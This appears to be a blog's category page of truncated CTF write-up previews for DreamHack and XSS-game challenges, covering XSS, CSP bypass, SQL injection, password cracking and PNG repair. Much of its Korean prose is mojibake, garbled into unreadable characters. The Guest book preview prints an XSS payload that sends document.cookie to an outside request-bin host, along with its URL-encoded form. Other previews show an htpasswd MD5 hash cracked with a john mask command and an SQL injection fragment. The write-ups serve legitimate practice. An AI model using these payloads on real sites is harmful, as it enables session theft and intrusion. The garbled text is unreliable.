๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐ŸดCTF88

XSS game - [2/6] Level 2: Persistence is key https://xss-game.appspot.com/level2 https://xss-game.appspot.com/level2 Oops! Based on your browser cookies it seems like you haven't passed the previous level of the game. Please go back to the previous level and complete the challenge. xss-game.appspot.com 2023. 9. 10.
XSS game - [1/6] Level 1: Hello, world of XSS https://xss-game.appspot.com/level1 XSS game: Level 1 xss-game.appspot.com 2023. 9. 10.
DreamHack - CSP Bypass Advanced ํ’€์ด ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์‹คํ–‰์ด ์•ˆ๋œ ์ด์œ  @app.after_request def add_header(response): global nonce response.headers['Content-Security-Policy'] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'; object-src 'none'" nonce = os.urandom(16).hex() return response request ํ•  ๋•Œ๋งˆ๋‹ค ํ—ค๋”์— CSP(Content-Security-Policy)๊ฐ€ ๋ถ™๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค. ๋” ์‚ดํŽด๋ณด์ž๋ฉด script-src๊ฐ€ self์ด๊ธฐ ๋•Œ๋ฌธ์— orig.. 2023. 9. 10.
DreamHack - chocoshop ํ’€์ด ์ทจ์•ฝ์  r.expire(used_coupon, timedelta(seconds=coupon['expiration'] - int(time()))) ์šฐ์„  ์ด๋ ‡๊ฒŒ ์‚ฌ์šฉํ•œ ์ฟ ํฐ์„ (์ฟ ํฐ๋งŒ๋ฃŒ์‹œ๊ฐ„ + ํ˜„์žฌ์‹œ๊ฐ„) ๋’ค์— ์ œ๊ฑฐํ•˜๋Š” ๊ฒƒ์ด ์ข€ ์ˆ˜์ƒํ–ˆ๊ณ  if coupon['expiration'] { var coupon = res.coupon; fetch(url+"/coupon/submit", { "headers": { "accept": "*/*", "accept-language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", "authorization": aut.. 2023. 9. 9.
DreamHack - funjs ํ’€์ด ๊ฐœ๋ฐœ์ž ๋„๊ตฌ์— Sources ํƒญ์—์„œ ๋ธŒ๋ ˆ์ดํฌ ํฌ์ธํŠธ๋ฅผ ๊ฑฐ๋Š” ๊ฒƒ์ด ํ•ต์‹ฌ if (flag[_0x374fd6(0x17c)] != 0x24) { ์ฒ˜์Œ์— ์ด ์กฐ๊ฑด๋ฌธ ๋•Œ๋ฌธ์— ์ž๊พธ NOP! ๊ฐ€ ์ถœ๋ ฅ์ด ๋˜๋Š”๋ฐ ๋ฌด์Šจ ๋‚ด์šฉ์ธ์ง€ ํ™•์ธํ•˜๋ ค๋ฉด Console ์ฐฝ์—๋‹ค๊ฐ€ flag[_0x374fd6(0x17c)]์™€ 0x24๋ฅผ ๊ฐ๊ฐ ์ž…๋ ฅ ๊ทธ ๊ฒฐ๊ณผ if (flag.length != 36)๋ฅผ ๋œปํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธ ํ”Œ๋ž˜๊ทธ ์ž…๋ ฅ ๊ฐ’์„ ์ผ๋ถ€๋กœ 36๊ธ€์ž๋กœ ์ž…๋ ฅํ•ด์„œ ๋‹ค์Œ ๋ผ์ธ์„ ์ง„ํ–‰ํ•˜์˜€๋‹ค. ์œ„์™€ ๋น„์Šทํ•˜๊ฒŒ ํ•œ์ค„ํ•œ์ค„ ์ง„ํ–‰ ๊ณผ์ •์„ ํ™•์ธํ•˜๋ฉด์„œ ๋“œ๋””์–ด ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’๊ณผ ์‹ค์ œ flag ๊ฐ’์„ ๋น„๊ตํ•˜๋Š” ๋ฐ˜๋ณต๋ฌธ์„ ์ฐพ์•„์ฃผ์—ˆ๋Š”๋ฐ ๋‚œ ์•„๋ž˜์ฒ˜๋Ÿผ ์ˆ˜์ •์„ ํ•˜์—ฌ ์ง„์งœ flag ๊ฐ’์„ ์ฐพ์„ ์ˆ˜ ์žˆ์—ˆ๋‹ค. result = "" for (var i = 0x0; i < flag[_0x374.. 2023. 9. 9.
DreamHack - [wargame.kr] tmitter ํ’€์ด SQL Injection ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ํŽ˜์ด์ง€ ์ฐพ๊ธฐ ์šฐ์„  ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€, ํšŒ์› ๊ฐ€์ž… ํŽ˜์ด์ง€์— ๋‹จ๋”ฐ์˜ดํ‘œ(โ€˜)๋‚˜ ์Œ๋”ฐ์˜ดํ‘œ(")๋ฅผ ๋‹ค ๋„ฃ์—ˆ์ง€๋งŒ ๋”ฑํžˆ ๋ฌธ์ œ์—†์ด ํšŒ์› ๊ฐ€์ž…๊ณผ ๋กœ๊ทธ์ธ์ด ์ž‘๋™ํ–ˆ๋‹ค. ํ•˜์ง€๋งŒ ๋‹‰๋„ค์ž„์— ๋‹จ๋”ฐ์˜ดํ‘œ(โ€™)๊ฐ€ ์žˆ์„ ๋•Œ tmitter ์ž‘์„ฑ ๊ธฐ๋Šฅ์ด ์ž˜ ์•ˆ๋˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜์—ฌ ์ž‘์„ฑ ๊ธฐ๋Šฅ์— SQLi ์ทจ์•ฝํ•œ ์ ์„ ์ฐพ์•˜๋‹ค. ํ•„๋“œ ๊ฐœ์ˆ˜ ํ™•์ธํ•˜๊ธฐ tmitter ์ž‘์„ฑ ๊ธฐ๋Šฅ์— ์‚ฌ์šฉํ•˜๋Š” SQL ์ฟผ๋ฆฌ๋ฌธ์„ ์˜ˆ์ธก์„ ํ•ด๋ณด์•˜๋‹ค. ์ฒ˜์Œ์—๋Š” ์•„๋ž˜์™€ ๊ฐ™์€ ์ฟผ๋ฆฌ๋ฅผ ์“ฐ์ง€ ์•Š์„๊นŒ ์ƒ๊ฐ์„ ํ–ˆ์—ˆ์ง€๋งŒ ๊ทธ๋Ÿผ ๊ณต๊ฒฉ์ด ๋จนํžˆ๊ธฐ ์‰ฝ์ง€ ์•Š์•˜๋‹ค. insert into tmitter_board(id, msg) values ('guest', 'hello'); ์•„๋ฌดํŠผ ๋ฉ”์‹œ์ง€', null)#์„ ์“ฐ๊ณ  ์ž‘์„ฑ์„ ํ•˜๋‹ˆ ์ œ๋Œ€๋กœ ์˜ฌ๋ผ๊ฐ€๋Š” ๊ฒƒ์„ ํ™•์ธํ•˜๊ณ  ํ•„๋“œ๊ฐ€ ๋ช‡ ๊ฐ€์ง€ ๋” .. 2023. 9. 9.
DreamHack - [wargame.kr] crack crack crack it ํ’€์ด htpassswd blueh4g:$1$SVXyqAwy$iMW9SbLyUd1v6Fen7mNUe0 ๋ณด์ž๋งˆ์ž shadow ํŒŒ์ผ์ด ๋– ์˜ฌ๋ž์œผ๋ฉฐ [username]:[$password_id]:[$salt]:[$encrypted_password] ์ผ ๊ฒƒ์ด๋ผ๊ณ  ์ƒ๊ฐํ–ˆ๋‹ค. ์ฒซ ๋ฒˆ์งธ ํ•„๋“œ $1์€ MD5๋ฅผ ๋‚˜ํƒ€๋‚ธ๋‹ค. ๋ฌธ์ œ์—์„œ ํŒจ์Šค์›Œ๋“œ๊ฐ€ ์ฒ˜์Œ์—๋Š” G4HeulB๋กœ ์‹œ์ž‘ํ•˜๋ฉฐ ์•ŒํŒŒ๋ฒณ ์†Œ๋ฌธ์ž์™€ ์ˆซ์ž๋“ค๋กœ ๊ตฌ์„ฑ ๋๋‹ค๊ณ  ์–ธ๊ธ‰ํ–ˆ๋‹ค. ์šฐ์„  ํŒจ์Šค์›Œ๋“œ ํฌ๋ž™ ๋„๊ตฌ์ธ john์„ ์‚ฌ์šฉ์„ ํ–ˆ์œผ๋ฉฐ mask ์˜ต์…˜์„ ์‚ฌ์šฉํ•˜์—ฌ ์›ํ•˜๋Š” ๋ฌธ์ž๋กœ ์ด๋ฃจ์–ด์ง„ ์ž„์˜์˜ ํŒจ์Šค์›Œ๋“œ๋ฅผ ์ƒ์„ฑํ•ด brute forcing ํ•˜์˜€๋‹ค. john htpasswd -1=[0-9a-z] --mask='G4HeulB?1' --max-length=11 ๋ช‡ ์ดˆ ์ง€๋‚˜์ง€ ์•Š์•„ ๋ฐ”๋กœ ํฌ๋ž˜ํ‚น์ด ์„ฑ๊ณต๋˜์—ˆ์œผ.. 2023. 9. 9.
DreamHack - broken-png ํ’€์ด image.pngโ€™s hex 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 02 00 00 00 01 00 ๋งจ ์ฒ˜์Œ 89 50 4E 47 0D 0A 1A 0A 00 00 00 ๋ถ€๋ถ„์€ png์˜ ์‹œ๊ทธ๋‹ˆ์ฒ˜ ๊ฐ’์„ ์˜๋ฏธํ•œ๋‹ค. ๊ทธ ๋ฐ”๋กœ ์•„๋ž˜์— 00 00 02 00 00 00 01 00๋Š” ๊ฐ๊ฐ width์™€ height ๊ฐ’์ด ์œ„์น˜ํ•œ๋‹ค. image.pngโ€™s width property 00 00 02 00 200(16)์€ 512(10)์ด๋ฏ€๋กœ ์ด๋ฏธ์ง€์˜ width๋Š” 512px๋ฅผ ์˜๋ฏธํ•œ๋‹ค. image.pngโ€™s height property 00 00 01 00 100(16)์€ 256(10)์ด๋ฏ€๋กœ ์ด๋ฏธ์ง€์˜ height๋Š” 256px๋ฅผ ์˜๋ฏธํ•œ๋‹ค. ๋ฌธ์ œ์—์„œ ์›๋ณธ์€ ์ •์‚ฌ๊ฐํ˜• ํฌ๊ธฐ์˜€์œผ๋‚˜.. 2023. 9. 8.
DreamHack - phpreg ํ’€์ด ์ฒซ ๋ฒˆ์งธ ๋ฌธ์ œ : ์กฐ๊ฑด์— ๋งŒ์กฑํ•˜๋Š” name ์ฐพ๊ธฐ ์•„๋ž˜ ์ฝ”๋“œ๋ฅผ ํ™•์ธํ•˜๋ฉด ๋‹จ๋ฒˆ์— name์€ "dnyang0310"๊ฐ€ ์ •๋‹ต์ธ ๊ฑธ ์•Œ ์ˆ˜ ์žˆ๋‹ค. if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") ํ•˜์ง€๋งŒ ์•„๋ž˜ preg_replace์— ์˜ํ•ด "nyang"์ด ๊ณต๋ฐฑ์œผ๋กœ ์น˜ํ™˜๋œ๋‹ค. $name = preg_replace("/nyang/i", "", $input_name); ๋‹จ์–ด๊ฐ€ ๊ณต๋ฐฑ์œผ๋กœ ์น˜ํ™˜๋˜๋Š” ๊ฒƒ์€ ์•„๋ž˜์™€ ๊ฐ™์ด ์‰ฝ๊ฒŒ ์šฐํšŒ ๊ฐ€๋Šฅํ•˜๋‹ค. dnnyangyang0310 --> dn yang0310 --> dnyang0310 ๋‘ ๋ฒˆ์งธ ๋ฌธ์ œ : ์กฐ๊ฑด์— ๋งŒ์กฑํ•˜๋Š” password ์ฐพ๊ธฐ ์•„๋ž˜ ์กฐ๊ฑด์‹์œผ๋กœ ์ธํ•ด ํŒจ์Šค์›Œ๋“œ์— ์•ŒํŒŒ๋ฒณ์ด ํฌํ•จํ•  ์ˆ˜๊ฐ€ ์—†๋‹ค. // pw filtering if (pr.. 2023. 9. 8.
DreamHack - out_of_boundary ํ’€์ด out_of_boundary.c #include #include #include #include #include char name[16]; char *command[10] = { "cat", "ls", "id", "ps", "file ./oob" }; void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } int main() { int idx; initialize(); printf("Admin name: "); read(0, name.. 2023. 9. 8.
DreamHack - Guest book v0.2 ํ’€์ด ๋จผ์ € ํŽ˜์ด์ง€ ํ•˜๋‹จ์— ์ž‘์„ฑ๋œ ํƒœ๊ทธ๋“ค์„ ์ฐพ๊ฒŒ ๋˜๋ฉด ๋ฌธ์ œ ํ‘ธ๋Š” ์†๋„๊ฐ€ ๋นจ๋ž์„ ๊ฒƒ์ด๋‹ค. config.js์˜ ๋‚ด์šฉ์€ ์•„๋ž˜์™€ ๊ฐ™๋‹ค. window.CONFIG = { version: "v0.2", main: "/", debug: false, debugMSG: "" } // prevent overwrite Object.freeze(window.CONFIG); ์•„๋ž˜์˜ Object.freeze ๋ฉ”์†Œ๋“œ์œผ๋กœ ์ธํ•ด window.CONFIG๊ฐ€ overwriting์ด ์•ˆ๋˜๋Š” ์ƒํ™ฉ์ด๋ฉฐ if ์กฐ๊ฑด์ด false๋กœ ๋‚˜์˜ค๋ฉด์„œ ์•„๋ž˜์˜ "localtion.href = window.CONFIG.main" ๋ผ์ธ์„ ์‹คํ–‰ํ•˜์ง€ ๋ชปํ•œ๋‹ค. config.js ์šฐํšŒ ๋ฐฉ๋ฒ• ์ชฝ์— ๋ฌธ์ œ์ ์ด ํ•˜๋‚˜ ์žˆ์—ˆ๋‹ค. ๋ฐ”๋กœ .js ์ž์›์„(config.js) ์ƒ๋Œ€ ๊ฒฝ๋กœ ํ˜•ํƒœ๋กœ ์ฝ.. 2023. 9. 7.
DreamHack - Guest book ํ’€์ด ๋ฐฉ๋ฒ• 1. name๊ณผ onfocus ์‚ฌ์šฉ [dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie') ์œ„ ํ…์ŠคํŠธ๋ฅผ URL Encoding ํ•œ๋‹ค. %5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29 ์ธ์ฝ”๋”ฉ ๋œ ๊ฐ’์„ content ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฐ’์œผ๋กœ ๊ฑด๋„ค์ฃผ๋Š”๋ฐ URL ๋’ค์— #foo๋ฅผ ํฌํ•จํ•˜๋Š” ๊ฒƒ์ด ํ•ต์‹ฌ http:.. 2023. 9. 7.
728x90